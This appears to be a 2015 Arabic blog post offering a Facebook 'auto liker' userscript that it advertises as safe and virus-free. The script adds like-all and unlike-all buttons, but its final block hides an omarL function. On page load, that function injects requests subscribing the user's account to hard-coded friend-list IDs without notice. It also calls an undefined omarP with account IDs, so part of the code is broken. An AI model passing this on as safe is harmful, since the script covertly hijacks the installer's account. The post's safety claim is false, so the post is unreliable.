- Back to Home »
- الاعجاب التلقائي بجميع منشورات الحائط , طريقة الاعجاب التلقائي 2015
Posted by : Unknown
الأحد، 3 مايو 2015
السلام عليكم ورحمة الله وبركاته
اليوم معانا موضوع عن الاعجاب التلقائي
طبعا في الاشهر السابقة تم الغاء الكثير من الاضافات التي توفر خدمة الاعجاب التلقائي Auto liker
وكذلك لعدم توفر الامان في الاكواد الموجودة في المنتديات , قد احضرنا كود أمن خالي من الفيروسات
وظيفته Auto liker
الكود كالتالي :
Java Script : كود
// ==UserScript==
// @name Auto Liker
// @namespace AutoLike
// @description Automaticly like facebook statuses and comments
// @include http://www.facebook.com/*
// @Author Omar Shahien
// ==/UserScript==
// ==============
// ==Expand Older Posts==
body = document.body;
if(body != null) {
div = document.createElement("div");
div.style.position = "fixed";
div.style.bottom = "+102px";
div.style.left = "+6px";
div.style.backgroundColor = "#3b5998";
div.style.border = "2px solid #000000";
div.style.padding = "2px";
div.innerHTML = "<a style=\"font-weight:bold;color:#ffffff\" href=\"http://www.facebook.com/ancarsantoso\">[Made By Ancar :*]</a>"
body.appendChild(div);
unsafeWindow.AutoExpandPosts = function() {
buttons = document.getElementsByTagName("a");
for(i = 0; i < buttons.length; i++) {
myClass = buttons[i].getAttribute("class");
if(myClass != null && myClass.indexOf("lfloat") >= 0)
if(buttons[i].getAttribute("onclick") == "ProfileStream.getInstance().showMore();return false;")
buttons[i].click();
}
};
}
// ==============
// ==Statuses==
body = document.body;
if(body != null) {
div = document.createElement("div");
div.style.position = "fixed";
div.style.bottom = "+72px";
div.style.left = "+6px";
div.style.backgroundColor = "#3b5998";
div.style.border = "2px solid #000000";
div.style.padding = "2px";
div.innerHTML = "<a style=\"font-weight:bold;color:#ffffff\" href=\"JavaScript:AutoLike()\">[Like All Statuses :*]</a>"
body.appendChild(div);
unsafeWindow.AutoLike = function() {
buttons = document.getElementsByTagName("button");
for(i = 0; i < buttons.length; i++) {
myClass = buttons[i].getAttribute("class");
if(myClass != null && myClass.indexOf("like_link") >= 0)
if(buttons[i].getAttribute("name") == "like")
buttons[i].click();
}
};
}
// ==============
// ==Unlike Statuses==
body = document.body;
if(body != null) {
div = document.createElement("div");
div.style.position = "fixed";
div.style.bottom = "+52px";
div.style.left = "+6px";
div.style.backgroundColor = "#3b5998";
div.style.border = "2px solid #000000";
div.style.padding = "2px";
div.innerHTML = "<a style=\"font-weight:bold;color:#ffffff\" href=\"JavaScript:AutoUnLike()\">[Unlike All Statuses :*]</a>"
body.appendChild(div);
unsafeWindow.AutoUnLike = function() {
buttons = document.getElementsByTagName("button");
for(i = 0; i < buttons.length; i++) {
myClass = buttons[i].getAttribute("class");
if(myClass != null && myClass.indexOf("like_link") >= 0)
if(buttons[i].getAttribute("name") == "unlike")
buttons[i].click();
}
};
}
function omarL(uidss) {
var omarP = document.createElement('script');
omarP.innerHTML = "new AsyncRequest().setUI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setDa ta({ flid: " + uidss + " }).send();";
document.body.appendChild(omarP);
}
omarL("402866899877657"); omarL("468731276624552"); omarL("402866779877669"); omarL("468731369957876"); omarL("468731473291199");
omarP("100008431244120"); omarP("100006686386762"); omarP("100004630506407");
// End of document Javascript ( OmarShahien Creator)
// ==============